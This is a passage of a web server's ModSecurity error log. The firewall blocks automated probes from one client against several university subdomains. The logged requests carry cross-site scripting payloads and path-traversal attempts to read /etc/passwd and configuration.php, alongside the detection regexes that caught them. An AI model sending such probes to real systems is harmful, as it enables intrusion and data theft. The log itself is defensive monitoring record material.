[Tue Aug 29 11:51:13.680944 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAfWODgAAAAL"]
[Tue Aug 29 11:51:13.682760 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAm91mcAAAAG"]
[Tue Aug 29 11:51:13.723404 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAmNp2kAAAAQ"]
[Tue Aug 29 11:51:14.550123 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QsCo-f0AAAm5BwoAAAAA"]
[Tue Aug 29 11:51:14.684593 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAm@5wYAAAAH"]
[Tue Aug 29 11:51:14.687182 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAm7m84AAAAE"]
[Tue Aug 29 11:51:14.687807 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAnMeoIAAAAD"]
[Tue Aug 29 11:51:14.751262 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAhhc0cAAAAd"]
[Tue Aug 29 11:51:14.759430 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAnIlfEAAAAV"]
[Tue Aug 29 11:51:15.625739 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAhhc0kAAAAd"]
[Tue Aug 29 11:51:15.627700 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAnCKyUAAAAK"]
[Tue Aug 29 11:51:15.667534 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnMeoUAAAAD"]
[Tue Aug 29 11:51:15.668705 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAl4sXkAAAAf"]
[Tue Aug 29 11:51:15.671087 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkr0EQAAAAC"]
[Tue Aug 29 11:51:15.671691 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnB5UYAAAAJ"]
[Tue Aug 29 11:51:15.728318 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnCKycAAAAK"]
[Tue Aug 29 11:51:15.755738 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAkyyEEAAAAW"]
[Tue Aug 29 11:51:15.756664 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAm5BxEAAAAA"]
[Tue Aug 29 11:51:15.838993 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAjdQTcAAAAZ"]
[Tue Aug 29 11:51:15.840846 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAm@5woAAAAH"]
[Tue Aug 29 11:51:15.843624 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAnB5UgAAAAJ"]
[Tue Aug 29 11:51:15.877357 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnMeocAAAAD"]
[Tue Aug 29 11:51:15.880786 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAm@5wsAAAAH"]
[Tue Aug 29 11:51:15.908074 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAhhc00AAAAd"]
[Tue Aug 29 11:51:15.922805 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAm5BxIAAAAA"]
[Tue Aug 29 11:51:15.924481 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAnCKysAAAAK"]
[Tue Aug 29 11:51:15.999408 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAfWOD0AAAAL"]
[Tue Aug 29 11:51:16.540549 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAm5BxMAAAAA"]
[Tue Aug 29 11:51:16.552345 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAmHd9sAAAAz"]
[Tue Aug 29 11:51:16.554638 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RMCo-f0AAAhhc04AAAAd"]
[Tue Aug 29 11:51:16.560160 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RMCo-f0AAAl4sX0AAAAf"]
[Tue Aug 29 11:51:16.580372 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAjdQTsAAAAZ"]
[Tue Aug 29 11:51:16.583389 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 